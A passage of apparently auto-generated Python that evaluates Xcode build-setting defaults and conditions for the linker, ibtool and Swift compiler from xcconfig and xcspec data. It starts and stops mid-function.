# $(HIDE_BITCODE_SYMBOLS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "HIDE_BITCODE_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_THREAD_SANITIZER__DefaultValue(xcconfigs, id_configs):
# $(ENABLE_THREAD_SANITIZER)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_THREAD_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__Condition(xcconfigs, id_configs):
# $(ENABLE_ADDRESS_SANITIZER) == YES || $(ENABLE_THREAD_SANITIZER) == YES || $(ENABLE_UNDEFINED_BEHAVIOR_SANITIZER) == YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "ENABLE_ADDRESS_SANITIZER"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "ENABLE_THREAD_SANITIZER"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "ENABLE_UNDEFINED_BEHAVIOR_SANITIZER"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, (eval_val_0 == "YES" or eval_val_1 == "YES" or eval_val_2 == "YES"))
def _com_apple_pbx_linkers_ld__LD_DEBUG_VARIANT__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__Condition(xcconfigs, id_configs):
# $(DEPLOYMENT_POSTPROCESSING) == YES && $(SKIP_INSTALL) == NO && $(INSTALL_PATH) != ""
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEPLOYMENT_POSTPROCESSING"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SKIP_INSTALL"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "INSTALL_PATH"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, (eval_val_0 == "YES" and eval_val_1 == "NO" and eval_val_2 != ""))
def _com_apple_pbx_linkers_ld__LD_FINAL_OUTPUT_FILE__DefaultValue(xcconfigs, id_configs):
# $(INSTALL_PATH)/$(EXECUTABLE_PATH)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "INSTALL_PATH"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "EXECUTABLE_PATH"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_pbx_linkers_ld__LD_DEPENDENCY_INFO_FILE__DefaultValue(xcconfigs, id_configs):
# $(OBJECT_FILE_DIR_$(CURRENT_VARIANT))/$(CURRENT_ARCH)/$(PRODUCT_NAME)_dependency_info.dat
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CURRENT_VARIANT"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "CURRENT_ARCH"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "PRODUCT_NAME"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
eval_val_3 = ""
eval_key_3 = "OBJECT_FILE_DIR_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_3 in xcconfigs:
eval_val_3 = xcconfigs[eval_key_3]
used_user_content = True
elif eval_key_3 in id_configs:
opt = id_configs[eval_key_3]
if "DefaultValue" in opt:
(eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_3_used_user_content
return (used_user_content, "{eval_val_3}/{eval_val_1}/{eval_val_2}_dependency_info.dat".format(eval_val_3 = eval_val_3, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2))
def _com_apple_pbx_linkers_ld__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue(xcconfigs, id_configs):
# donothing
return (False, "donothing")
def _com_apple_pbx_linkers_ld__LD_DYLIB_ALLOWABLE_CLIENTS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__Condition(xcconfigs, id_configs):
# $(MACH_O_TYPE) != mh_object
used_user_content = False
eval_val_0 = ""
eval_key_0 = "MACH_O_TYPE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 != "mh_object"))
def _com_apple_pbx_linkers_ld__ALL_OTHER_LDFLAGS__DefaultValue(xcconfigs, id_configs):
# $(LD_FLAGS) $(SECTORDER_FLAGS) $(OTHER_LDFLAGS) $(OTHER_LDFLAGS_$(variant)) $(OTHER_LDFLAGS_$(arch)) $(OTHER_LDFLAGS_$(variant)_$(arch)) $(PRODUCT_SPECIFIC_LDFLAGS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "LD_FLAGS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SECTORDER_FLAGS"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "OTHER_LDFLAGS"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
eval_val_3 = ""
eval_key_3 = "variant"
if eval_key_3 in xcconfigs:
eval_val_3 = xcconfigs[eval_key_3]
used_user_content = True
elif eval_key_3 in id_configs:
opt = id_configs[eval_key_3]
if "DefaultValue" in opt:
(eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_3_used_user_content
eval_val_4 = ""
eval_key_4 = "arch"
if eval_key_4 in xcconfigs:
eval_val_4 = xcconfigs[eval_key_4]
used_user_content = True
elif eval_key_4 in id_configs:
opt = id_configs[eval_key_4]
if "DefaultValue" in opt:
(eval_val_4_used_user_content, eval_val_4) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_4_used_user_content
eval_val_5 = ""
eval_key_5 = "PRODUCT_SPECIFIC_LDFLAGS"
if eval_key_5 in xcconfigs:
eval_val_5 = xcconfigs[eval_key_5]
used_user_content = True
elif eval_key_5 in id_configs:
opt = id_configs[eval_key_5]
if "DefaultValue" in opt:
(eval_val_5_used_user_content, eval_val_5) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_5_used_user_content
eval_val_6 = ""
eval_key_6 = "OTHER_LDFLAGS_{eval_val_3}".format(eval_val_3 = eval_val_3)
if eval_key_6 in xcconfigs:
eval_val_6 = xcconfigs[eval_key_6]
used_user_content = True
elif eval_key_6 in id_configs:
opt = id_configs[eval_key_6]
if "DefaultValue" in opt:
(eval_val_6_used_user_content, eval_val_6) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_6_used_user_content
eval_val_7 = ""
eval_key_7 = "OTHER_LDFLAGS_{eval_val_4}".format(eval_val_4 = eval_val_4)
if eval_key_7 in xcconfigs:
eval_val_7 = xcconfigs[eval_key_7]
used_user_content = True
elif eval_key_7 in id_configs:
opt = id_configs[eval_key_7]
if "DefaultValue" in opt:
(eval_val_7_used_user_content, eval_val_7) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_7_used_user_content
eval_val_8 = ""
eval_key_8 = "OTHER_LDFLAGS_{eval_val_3}_{eval_val_4}".format(eval_val_3 = eval_val_3, eval_val_4 = eval_val_4)
if eval_key_8 in xcconfigs:
eval_val_8 = xcconfigs[eval_key_8]
used_user_content = True
elif eval_key_8 in id_configs:
opt = id_configs[eval_key_8]
if "DefaultValue" in opt:
(eval_val_8_used_user_content, eval_val_8) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_8_used_user_content
return (used_user_content, "{eval_val_0} {eval_val_1} {eval_val_2} {eval_val_6} {eval_val_7} {eval_val_8} {eval_val_5}".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2, eval_val_6 = eval_val_6, eval_val_7 = eval_val_7, eval_val_8 = eval_val_8, eval_val_5 = eval_val_5))
def _com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__Condition(xcconfigs, id_configs):
# $(MACH_O_TYPE) == mh_object
used_user_content = False
eval_val_0 = ""
eval_key_0 = "MACH_O_TYPE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "mh_object"))
def _com_apple_pbx_linkers_ld__OTHER_LDRFLAGS__DefaultValue(xcconfigs, id_configs):
# $(OTHER_LDFLAGS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "OTHER_LDFLAGS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_ibtool_compiler__IBC_FLATTEN_NIBS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_ibtool_compiler__IBC_ERRORS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_ibtool_compiler__IBC_WARNINGS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_ibtool_compiler__IBC_NOTICES__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_ibtool_compiler__IBC_OTHER_FLAGS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_ibtool_compiler__IBC_PLUGINS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_ibtool_compiler__IBC_REGIONS_AND_STRINGS_FILES__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_ibtool_compiler__IBC_PLUGIN_SEARCH_PATHS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_ibtool_compiler__IBC_MODULE__DefaultValue(xcconfigs, id_configs):
# $(PRODUCT_MODULE_NAME)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "PRODUCT_MODULE_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_ibtool_compiler__build_file_compiler_flags__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_ibtool_compiler__XIB_COMPILER_INFOPLIST_CONTENT_FILE__DefaultValue(xcconfigs, id_configs):
# $(TARGET_TEMP_DIR)/$(InputFileRegionPathComponent)$(InputFileBase)-PartialInfo.plist
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TARGET_TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "InputFileRegionPathComponent"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "InputFileBase"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}{eval_val_2}-PartialInfo.plist".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2))
def _com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_AUTO_ACTIVATE_CUSTOM_FONTS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_ibtool_compiler__IBC_COMPILER_USE_NIBARCHIVES_FOR_MACOS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_swift_compiler__SWIFT_EXEC__DefaultValue(xcconfigs, id_configs):
# swiftc
return (False, "swiftc")
def _com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARIES_ONLY__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_INCREMENTAL_COMPILATION__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_CROSS_MODULE_OPTIMIZATION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_PRECOMPILE_BRIDGING_HEADER__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WHOLE_MODULE_OPTIMIZATION__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_USE_PARALLEL_WMO_TARGETS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_WHOLE_MODULE_OPTIMIZATION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_LIBRARY_PATH__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_swift_compiler__SWIFT_MODULE_NAME__DefaultValue(xcconfigs, id_configs):
# $(PRODUCT_MODULE_NAME)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "PRODUCT_MODULE_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_BRIDGING_HEADER__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_xcode_tools_swift_compiler__SWIFT_OBJC_INTERFACE_HEADER_NAME__DefaultValue(xcconfigs, id_configs):
# $(SWIFT_MODULE_NAME)-Swift.h
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_MODULE_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, "{eval_val_0}-Swift.h".format(eval_val_0 = eval_val_0))
def _com_apple_xcode_tools_swift_compiler__SWIFT_INSTALL_OBJC_HEADER__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_OPTIMIZATION_LEVEL__DefaultValue(xcconfigs, id_configs):
# -O
return (False, "-O")
def _com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__Condition(xcconfigs, id_configs):
# !$(SWIFT_WHOLE_MODULE_OPTIMIZATION) && $(SWIFT_OPTIMIZATION_LEVEL) != '-Owholemodule'
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_WHOLE_MODULE_OPTIMIZATION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_OPTIMIZATION_LEVEL"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (not eval_val_0 and eval_val_1 != "-Owholemodule"))
def _com_apple_xcode_tools_swift_compiler__SWIFT_COMPILATION_MODE__DefaultValue(xcconfigs, id_configs):
# singlefile
return (False, "singlefile")
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__Condition(xcconfigs, id_configs):
# !$(SWIFT_WHOLE_MODULE_OPTIMIZATION) && $(SWIFT_OPTIMIZATION_LEVEL) != '-Owholemodule' && $(SWIFT_COMPILATION_MODE) != 'wholemodule'
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_WHOLE_MODULE_OPTIMIZATION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_OPTIMIZATION_LEVEL"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "SWIFT_COMPILATION_MODE"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
return (used_user_content, (not eval_val_0 and eval_val_1 != "-Owholemodule" and eval_val_2 != "wholemodule"))
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENABLE_BATCH_MODE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_DISABLE_SAFETY_CHECKS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_xcode_tools_swift_compiler__SWIFT_ENFORCE_EXCLUSIVE_ACCESS__DefaultValue(xcconfigs, id_configs):
# on
return (False, "on")
def _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__Condition(xcconfigs, id_configs):
# $(SWIFT_OPTIMIZATION_LEVEL) != '-Onone' && ($(SWIFT_ENFORCE_EXCLUSIVE_ACCESS) == 'full' || $(SWIFT_ENFORCE_EXCLUSIVE_ACCESS) == 'debug-only')
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_OPTIMIZATION_LEVEL"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_ENFORCE_EXCLUSIVE_ACCESS"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 != "-Onone" and (eval_val_1 == "full" or eval_val_1 == "debug-only")))
def _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_RELEASE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__Condition(xcconfigs, id_configs):
# $(SWIFT_OPTIMIZATION_LEVEL) == '-Onone' && ($(SWIFT_ENFORCE_EXCLUSIVE_ACCESS) == 'full' || $(SWIFT_ENFORCE_EXCLUSIVE_ACCESS) == 'debug-only')
used_user_content = False
eval_val_0 = ""
eval_key_0 = "SWIFT_OPTIMIZATION_LEVEL"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "SWIFT_ENFORCE_EXCLUSIVE_ACCESS"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 == "-Onone" and (eval_val_1 == "full" or eval_val_1 == "debug-only")))
def _com_apple_xcode_tools_swift_compiler____SWIFT_ENFORCE_EXCLUSIVE_ACCESS_DEBUG_ENFORCEMENT_DEBUG__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_xcode_tools_swift_compiler__SWIFT_SWIFT3_OBJC_INFERENCE__DefaultValue(xcconfigs, id_configs):
# Default
return (False, "Default")
def _com_apple_xcode_tools_swift_compiler__SWIFT_STDLIB__DefaultValue(xcconfigs, id_configs):
# swiftCore
return (False, "swiftCore")
def _com_apple_xcode_tools_swift_compiler__SWIFT_RESPONSE_FILE_PATH__DefaultValue(xcconfigs, id_configs):
# $(SWIFT_RESPONSE_FILE_PATH_$(variant)_$(arch))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "variant"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "arch"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
